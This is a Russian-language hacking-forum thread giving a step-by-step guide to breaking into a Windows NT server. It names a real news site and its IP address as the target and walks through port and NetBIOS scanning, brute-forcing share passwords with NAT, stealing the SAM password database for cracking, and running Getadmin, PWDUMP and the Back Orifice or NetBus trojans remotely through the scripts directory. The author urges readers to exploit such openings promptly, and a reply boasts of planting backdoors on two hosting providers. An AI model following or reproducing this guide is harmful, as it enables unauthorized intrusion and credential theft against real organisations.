• XSS.stack #1 – первый литературный журнал от юзеров форума

Взлом сервера Windows NT

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
Итак, рассмотрим идеальный вариант, при котором к сети Internet подключен сервер Windows NT, который не прикрыт Firewall'ом и хотя бы один порт в диапазоне 135-139 открыт. Такое иногда бывает и сейчас, когда молодая компания недавно начала свой бизнес, не имеет ни малейшего понятия о том, зачем ей firewall, а также пытается сэкономить деньги. Кроме того, может быть, в такой компании работает неопытный системный администратор, который просто инсталлирует Windows NT и устанавливает последний Service Pack. Затем ставится и настраивается IIS, после чего админ успокаивается, хотя ему следовало, прежде всего, включить аудит, сконфигурировать реестр, поставить последние патчи и fix'ы, а также отключить все ненужные службы и привязки (Binding) в настройках аппрета “Network” (Сеть).

Если сервер новостей штата Айдахо не был подвергнут вышеописанным настройкам, утилита Ogre выдала бы следующую информацию:

     Scanning - 198.60.102.4

     ======================

     Commencing Port Scan:

     Port 21: Open

Допустим, что открыта служба FTP, которая входит в состав IIS.

     Port 23: Closed

     Port 25: Open

Допустим, что открыта служба SMNP, которая входит в состав IIS

     Port 53: Open

     Port 79: Closed

     Port 80: Open

Допустим, что открыта служба HTTP, которая входит в состав IIS.

     Port 110: Open

     Port 111: Closed

     Port 139: Open

Допустим, что возможен File Sharing.

     Port 443: Closed

     Port 1080: Closed

     Port 8181: Closed

     Surveying Web Server:

     --Checking for Vulnerable URLs:

     Frontpage Extensions: Not Present

     IIS HTML Administration Interface: Present

Допустим, что возможно управление сервером через IIS.

IIS Samples: Present

Commencing Nbtstat Scan:

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

Registered Registered Registered Registered Registered Registered

Registered Registered Registered Registered Registered

MAC Address = XX-XX-XX-XX-XX-XX

Символами X, Y и Z, заменены реальные значения, которые мы получили бы, если бы сервер не был бы firewall'ом.

YYYYY <00> UNIQUE ----- Имя машины

YYYYY <20> UNIQUE

ZZZZZZZZZ <00> GROUP

ZZZZZZZZZ <1C> GROUP

ZZZZZZZZZ <1B> UNIQUE

ZZZZZZZZZ <1E> GROUP

YYYYY <03> UNIQUE

ZZZZZZZZZ <1D> UNIQUE

INet~Services <1C> GROUP

..__MSBROWSE__.<01> GROUP

IS~YYYYY.......<00> UNIQUE

Кроме того, информацию по NetBIOS мы можем получить, выполнив команду nbtstat -A x.x.x.x.Для расшифровки кодов имен NetBIOS вы можете использовать описания кодов, которые приведены ниже.

КОД ТИП ОПИСАНИЕ ИМЕН NETBIOS

00 UNIQUE Workstation Service

01 UNIQUE Messenger Service

<\ \ _MSBROWSE_>

01 GROUP Master Browser

03 UNIQUE Messenger Service

06 UNIQUE RAS Server Service

1F UNIQUE NetDDE Service

20 UNIQUE File Server Service

21 UNIQUE RAS Client Service

22 UNIQUE Exchange Interchange

23 UNIQUE Exchange Store

24 UNIQUE Exchange Directory

30 UNIQUE Modem Sharing Server Service

31 UNIQUE Modem Sharing Client Service

43 UNIQUE SMS Client Remote Control

44 UNIQUE SMS Admin Remote Control Tool

45 UNIQUE SMS Client Remote Chat

46 UNIQUE SMS Client Remote Transfer

4C UNIQUE DEC Pathworks TCPIP Service

52 UNIQUE DEC Pathworks TCPIP Service

87 UNIQUE Exchange MTA

6A UNIQUE Exchange IMC

BE UNIQUE Network Monitor Agent

BF UNIQUE Network Monitor Apps

03 UNIQUE Messenger Service

00 GROUP Domain Name

1B UNIQUE Domain Master Browser

1C GROUP Domain Controllers

1D UNIQUE Master Browser

1E GROUP Browser Service Elections

1C GROUP Internet Information Server

00 UNIQUE Internet Information Server

[2B] UNIQUE Lotus Notes Server

IRISMULTICAST

[2F] GROUP Lotus Notes

IRISNAMESERVER

[33] GROUP Lotus Notes

Forte_$ND800ZA

[20] UNIQUE DCA Irmalan Gateway Service

● Термин UNIQUE означает, что одному имени которого присвоен один IP-адрес;

● Термин GROUP означает нормальную группу, одному имени которой может принадлежать группа IP-адресов.

Для идеального варианта, который мы рассматриваем, мы получили информацию, от которой можно отталкиваться при взломе Windows NT. Из этой информации можно понять, что сервер предоставляет доступ для выделенных в совместное использование ресурсов и FTP.Затем можно попробовать зайти на сервер, используя бюджеты, которые стандартно присутствуют в Windows NT (Guest, Administrator), однако наверняка у вас ничего не получится. Кроме того, вы можете попытаться использовать бюджеты IIS (Internet Information Service), обычно они выглядят так IUSR_<имя машины>. При помощи утилиты Ogre мы получили информацию, что имя машины YYYYY, следовательно, бюджет IIS будет IUSR_ YYYYY.Однако и с этим вариантом, наверное, тоже ничего не получится.

Для взлома сервера Windows NT с выделенными в совместное использование каталогами, вам следует использовать утилиты, которые позволяют производить подключение к выделенным ресурсам с пользовательскими бюджетами и выполняют подбор пароля из словаря и/или прямым перебором всех возможных вариантов.

Использование программы NAT для подбора паролей к выделенным в совместное использование ресурсам http://igor.rsuh.ru/ftp/hacking/NetBIOS/nat10bin.zip

Наиболее удобной и полнофункциональной из этих утилит является программа NetBIOS Auditing Tool, реализации которой есть как под UNIX, так и под Win32.

Изначально программа Nat была создана для выполнения различных проверок защиты операционных систем, использующих NetBIOS. Данная программа работает в режиме командной строки. Вот ее синтаксис:

NAT [-O <ФАЙЛ_РЕЗУЛЬТАТОВ>] [-U <ФАЙЛ_СПИСКА_ПОЛЬЗОВАТЕЛЕЙ>] [-P <ФАЙЛ_ СЛОВАРЯ_ПАРОЛЕЙ>] <IP-АДРЕС>

По умолчанию в качестве файла списка пользователей используется файл Userlist.txt. Подправим этот файл, добавив в него новые имена, полученные при помощи программы Ogre. Файл словаря паролей лучше взять из программы L0phtCrack, сохранить под именем Passlist.txt. Добавим в него имена, полученные при помощи программы Ogre. Затем из командной строки выполним программу nat:

NAT -o REZALT.TXT 198.60.102.4

Программа NAT произведет тестирование всех сетевых служб, пробуя произвести подключение.

Обычно данный процесс бывает довольно длительным, продолжительность которого зависит от того, насколько удачно были составлены файлы списка пользователей и паролей. Однако с большой уверенностью можно сказать, что программа NAT сумеет подобрать пароль к одному из бюджетов в промежутке от 30 минут до 50 часов.

Далее процессу взлома сервера Windows NT гарантирован практически 100% успех. Время, которое потребуется для взлома системы зависит от того, насколько туп администратор системы. Если программе NAT удалось определить пароль для бюджета Administrator, то на этом процесс взлома успешно закончен, и вы можете делать с сервером практически что угодно. Если бюджет, который программа NAT определила, не является бюджетом Administrator, то время взлома зависит от того, какими возможностями обладает данный аккаунт и на какие ресурсы он имеет права доступа. Может быть, удастся подсоединить диск, используя команду NET USE и скопировать резервную копию файла базы данных паролей SAM._ из каталога WINNT/REPAIR для последующего вскрытия при помощи программы L0phtCrack, как уже было описано выше. Кроме того, подсоединив диск при помощи NET USE (или при помощи FTP) может быть удаться загрузить на удаленный компьютер одну из программ, которые помогут получить права администратора (Getadmin и т.д.). Для выполнения таких программ удаленно на серверах Windows NT, следует скопировать данные в каталог скриптов или в InetPub/cgi-bin. Затем, используя браузер, можно выполнить удаленно на сервере данные программы, введя в строке адреса строчку:

http://www.idahonews/scripts/getadmin.exe?mmmm

где mmmm, является именем пользователя, пароль которого вы определили.

Таким же образом возможно выполнить любую хакерскую утилиту вроде PWDUMP.EXE (для получения хеша пароля администратора) или троянские программы вроде Back Orifice или NetBus (http://indigo.ie/~lmf/ nb.htm), которые позволят сделать довольно многое. Короче, остальное дело техники и мастерства (а также везения).

P.S. За время работы над данной главой администратор Web-сервера новостей штата Айдахо http://www.idahonews.com/ немного подсуетился и запретил просматривать каталоги скриптов.

Так что, если видишь возможность взлома — пользуйся ей своевременно!!!
 
если есть возможность выполнять команды, то лучше всего залить бекдор через ftpd, и юзать на здоровье тачку.
я в своем время так и сделал у двух хостеров. :yahoo:
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх